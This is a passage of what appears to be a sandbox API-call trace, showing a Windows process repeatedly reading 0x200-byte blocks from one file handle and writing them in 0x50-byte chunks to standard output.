nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] GetFileType (hFile=0x50) returned 0x1 [0227.742] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.742] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.743] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.743] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType 
(hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.743] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.743] GetFileType (hFile=0x50) returned 0x1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.744] 
_get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.744] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.744] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.744] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.744] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, 
lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] GetFileType (hFile=0x50) returned 0x1 [0227.745] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.745] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.746] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.746] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, 
lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] GetFileType (hFile=0x50) returned 0x1 [0227.746] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.746] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: 
hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] GetFileType (hFile=0x50) returned 0x1 [0227.747] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.747] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.747] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.747] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.748] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle 
(_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] GetFileType (hFile=0x50) returned 0x1 [0227.748] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.748] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 
[0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.749] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.749] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] GetFileType (hFile=0x50) returned 0x1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.749] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.749] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, 
lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] GetFileType (hFile=0x50) returned 0x1 [0227.750] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.750] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.750] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.750] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.751] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.751] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.751] GetFileType (hFile=0x50) returned 0x1 [0227.751] _get_osfhandle (_FileHandle=1) returned 
0x50 [0227.751] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] WriteFile (in: hFile=0x50, lpBuffer=0x26ee1c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee1c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] WriteFile (in: hFile=0x50, lpBuffer=0x26ee6c*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ee6c*, lpNumberOfBytesWritten=0x26de70*=0x20, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.752] SetFilePointerEx (in: hFile=0x58, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de5c | out: lpNewFilePointer=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=4) returned 0x58 [0227.752] ReadFile (in: hFile=0x58, lpBuffer=0x26ec8c, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de7c, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesRead=0x26de7c*=0x200, lpOverlapped=0x0) returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] GetFileType (hFile=0x50) returned 0x1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.752] WriteFile (in: hFile=0x50, lpBuffer=0x26ec8c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ec8c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) 
returned 1 [0227.752] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ecdc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ecdc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ed2c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed2c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26ed7c*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26ed7c*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] GetFileType (hFile=0x50) returned 0x1 [0227.753] _get_osfhandle (_FileHandle=1) returned 0x50 [0227.753] WriteFile (in: hFile=0x50, lpBuffer=0x26edcc*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de70, lpOverlapped=0x0 | out: lpBuffer=0x26edcc*, lpNumberOfBytesWritten=0x26de70*=0x50, lpOverlapped=0x0) returned 1 [0227.753] 